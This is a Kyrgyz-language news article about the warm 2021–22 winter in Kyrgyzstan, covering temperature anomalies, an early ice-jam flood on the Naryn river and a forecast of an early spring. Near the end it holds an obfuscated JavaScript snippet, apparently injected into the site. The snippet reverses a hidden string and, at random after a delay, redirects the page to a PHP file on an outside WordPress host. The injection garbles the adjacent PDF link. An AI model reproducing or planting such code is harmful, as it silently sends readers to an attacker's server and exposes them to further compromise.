КЫШТЫН ЖЫЛУУ БОЛУШУНУН ТЕРС ТААСИРЛЕРИ БАРБЫ?

22-февраль, 2022-ж. / Редакция / Жаңылыктар 45

Кыргызгидрометерология агенттигинин метеорологиялык болжолдоо бөлүмүнүн башкы адиси Асылбүбү Маткеримова Кыргыз Республикасында 2019-жылдан бери октябрь, ноябрь айлары адаттагыдан суугураак, ал эми декабрь, январь жылуу болуп жаткандыгын билдирди.

Адистин айтымында мындай көрүнүш океандардын агымынын өзгөрүшүнөн улам болууда. Табият кубулуштары Жер шарынын түндүк, түштүк бөлүгүндө жайгашкан мамлекеттерде аба-ырайынын мурдагыга салыштырмалуу өзгөрүшүнө алып келүүдө.

Бирок, Асылбүбү Маткеримова мындан ары дайыма ушундай аба ырайы күтүлөт деп так кесе айта албайт. Кийинки жылы кар көп жаап, кыш эрте түшүп калышы мүмкүн.

Адистер эмне дейт?

Жалпысынан 2021-жылдын декабрь жана 2022-жылдын январь айларында кар өлкө боюнча нормадан аз жаады жана абанын табы декабрь айында көп жылдык нормадан +2 +4,5 градуска жылуу болгон. Республика боюнча бир гана Нарын облусунда суук болуп, абанын табы нормадан төмөн.

Январь айында өлкөнүн көпчүлүк аймактарында абанын табы көп жылдык нормадан +2 +5 градус жылуу болуп, айрыкча 15-16-январь күндөрү +17 градуска чейин жылуу болгон.

Кыргызгидромет агенттигинин февраль айына берген божомолунда республиканын аймагында кар аралаш жамгыр жаап, тоолуу аймактарда түнкүсүн -16 градуска чейин суук болушу күтүлөт деген. Ал эми Ош, Жалал-Абад, Баткен облустарында аба ырайы көп жылдык нормадан жылуу болду.

Март айында болсо, аба ырайында кескин өзгөрүүлөр байкалып турат. Кээ бир күндөрү жылуу болсо, айрым учурларда түнкүсүн -3 градуска чейин үшүк жүрүшү ыктымал.

Үйөр жүрдү

(Үйөр – жердеги дарыя нугунун тайыз жана кууш жерлерине муз топтолуп, күн жылуу болгон учурда суунун музду жарып, ташкындашы).

Үстүбүздөгү жылдын 11-январына караган түнү болжол менен саат 02:00-03:00 чамасында Нарын дарыясынын Чоң-Нарын агымында, Нарын шаарынан 55-60 чакырым алыстыктагы Кууганды участогунун тушундагы муздун алдынан агып жаткан суунун басымы көбөйүп, үстүңкү муздарды тээп чыгып, үйөр жүрө баштаган. Мындай көрүнүш жыл сайын болуп турат. Бир гана белгилеп кетүүчү жагдай, өткөн жылдарга салыштырмалуу 1-1,5 айга эрте өттү.

Маалыматты Жаратылыш ресурстары, экология жана техникалык көзөмөл министрлигинин Нарын аймактык башкармалыгынын жетекчиси Дамир Оморов тастыктады.

Жаз эрте келет

Жыл санак жана жылдыз санак боюнча адис, коомдук ишмер Дастан Сарыгулов быйыл жаз эрте келерин билдирди. Анын айтымында үркөр жылдызы ушул жылдын 1-апрелинде батат. Мындай учур 20 жылда бир жолу кайталанат.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/22_02.pdf»>2022-жылдын 22-февралы

Жазгүл КЕНЖЕТАЕВА

22-февраль, 2022-ж. / Редакция / Жаңылыктар 45
Бөлүшүү: Telegram WhatsApp X